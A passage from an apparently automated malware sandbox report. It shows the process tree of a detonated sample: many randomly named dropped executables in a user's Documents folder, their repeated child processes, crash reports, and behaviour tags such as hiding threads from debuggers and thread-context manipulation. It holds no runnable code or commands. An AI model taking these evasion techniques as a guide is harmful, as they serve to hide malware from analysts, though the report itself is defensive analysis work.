    PID:10680
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:15844
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:15932
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:12956
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:14012
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:5448
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:10924
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:3404
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:10168
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:7928
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:9860
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:16112
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:12284
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:13884
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:10532
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:6112
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:15928
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:6544
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:5396
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:6016
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:6764
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:7988
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:7088
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:13152
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:4436
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:15820
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:9640
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:5556
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:16352
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:7852
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:12340
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:2576
- C:\Users\Admin\Documents\pq5kzNRtl409ghB0EYFEFCkq.exe
  "C:\Users\Admin\Documents\pq5kzNRtl409ghB0EYFEFCkq.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2332
- C:\Users\Admin\Documents\_jZEi9wIDlkwuyeBbCkphrKE.exe
  "C:\Users\Admin\Documents\_jZEi9wIDlkwuyeBbCkphrKE.exe"
  2⤵
  - Executes dropped EXE
  PID:2096
- C:\Users\Admin\Documents\Gfben_qsBhcpl2Qy7JmD_scc.exe
  "C:\Users\Admin\Documents\Gfben_qsBhcpl2Qy7JmD_scc.exe"
  2⤵
  - Executes dropped EXE
  PID:1844
- - C:\Users\Admin\Documents\Gfben_qsBhcpl2Qy7JmD_scc.exe
    "C:\Users\Admin\Documents\Gfben_qsBhcpl2Qy7JmD_scc.exe"
    3⤵
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    PID:1636
- C:\Users\Admin\Documents\KgzcBGxYAcOqyAtT4Tl2hBuQ.exe
  "C:\Users\Admin\Documents\KgzcBGxYAcOqyAtT4Tl2hBuQ.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1936
- - C:\Users\Admin\Documents\KgzcBGxYAcOqyAtT4Tl2hBuQ.exe
    "C:\Users\Admin\Documents\KgzcBGxYAcOqyAtT4Tl2hBuQ.exe"
    3⤵
    PID:5452
- - C:\Users\Admin\Documents\KgzcBGxYAcOqyAtT4Tl2hBuQ.exe
    "C:\Users\Admin\Documents\KgzcBGxYAcOqyAtT4Tl2hBuQ.exe"
    3⤵
    PID:2220
- - C:\Users\Admin\Documents\KgzcBGxYAcOqyAtT4Tl2hBuQ.exe
    "C:\Users\Admin\Documents\KgzcBGxYAcOqyAtT4Tl2hBuQ.exe"
    3⤵
    PID:4628
- C:\Users\Admin\Documents\DF2l53IwE3QKl0yMSkf2AOsB.exe
  "C:\Users\Admin\Documents\DF2l53IwE3QKl0yMSkf2AOsB.exe"
  2⤵
  - Executes dropped EXE
  PID:1900
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1900 -s 248
    3⤵
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:3292
- C:\Users\Admin\Documents\vi4iUCtbSA37I7xCL1jQ1ZIk.exe
  "C:\Users\Admin\Documents\vi4iUCtbSA37I7xCL1jQ1ZIk.exe"
  2⤵
  - Executes dropped EXE
  PID:1776
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1776 -s 240
    3⤵
    - Program crash
    PID:4856
- C:\Users\Admin\Documents\Yi0sTCO3CwzpC1VOu4yN4wgd.exe
  "C:\Users\Admin\Documents\Yi0sTCO3CwzpC1VOu4yN4wgd.exe"
  2⤵
  - Executes dropped EXE
  PID:1708
- C:\Users\Admin\Documents\clgl6g0HmgWHV4nOLBiRhmFX.exe
  "C:\Users\Admin\Documents\clgl6g0HmgWHV4nOLBiRhmFX.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  PID:1480
- - C:\Program Files (x86)\Company\NewProduct\inst1.exe
    "C:\Program Files (x86)\Company\NewProduct\inst1.exe"
    3⤵
    - Executes dropped EXE
    PID:900
- - C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
    "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
    3⤵
    - Executes dropped EXE
    - Checks whether UAC is enabled
    PID:2108
- - C:\Program Files (x86)\Company\NewProduct\cutm3.exe
    "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
    3⤵
    - Executes dropped EXE
    PID:4596
- C:\Users\Admin\Documents\qhofWxi42CEklSr64GyF95Yy.exe
  "C:\Users\Admin\Documents\qhofWxi42CEklSr64GyF95Yy.exe"
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:1648
- C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
  "C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:1472
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    - Executes dropped EXE
    PID:5196
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    - Executes dropped EXE
    PID:5672
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5672 -s 28
      4⤵
      Program crash
      Checks processor information in registry
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      PID:5896
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    - Executes dropped EXE
    PID:5256
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    - Executes dropped EXE
    PID:4464
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    - Executes dropped EXE
    PID:5328
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    - Executes dropped EXE
    PID:748
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    - Executes dropped EXE
    PID:4648
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:3204
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:1532
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    - Executes dropped EXE
    PID:4872
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:668
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:4388
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:7064
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:6692
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:6312
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:6216
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:2260
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:5132
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:2168
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:6716
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6716 -s 28
      4⤵
      Program crash
      PID:3044
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:3908
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:1604
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:6188
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:6588
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:7028
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:3932
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    - Checks processor information in registry
    - Enumerates system info in registry
    PID:3044
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    - Checks processor information in registry
    - Enumerates system info in registry
    PID:6244
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:2424
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:4524
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:8128
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    - Executes dropped EXE
    PID:5352
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:2556
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:7716
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:1328
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:1696
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:5160
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:2072
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:2524
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:5128
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:6272
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:8024
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 8024 -s 28
      4⤵
      Program crash
      PID:828
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:4124
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:2028
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:2544
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:7792
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:7796
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:7476
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7476 -s 164
      4⤵
      Program crash
      PID:7204
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:924
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:7184
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:6344
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:576
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:4076
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:5936
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:4724
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:7304
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:1420
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:2924
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 28
      4⤵
      Program crash
      PID:2244
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:5960
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:2572
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:8184
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 8184 -s 28
      4⤵
      Program crash
      PID:1432
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    - Suspicious use of NtCreateProcessExOtherParentProcess
    PID:3980
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:2112
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:4160
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:1980
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:1032
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:8752
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:9056
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:5816
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:8944
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:6520
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:8924
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:8436
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:724
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:7364
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:8904
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:4216
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:8324
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:3208
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:4976
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:8028
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:1308
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:4428
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:4416
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:8568
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:7452
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:5340
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:1912
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
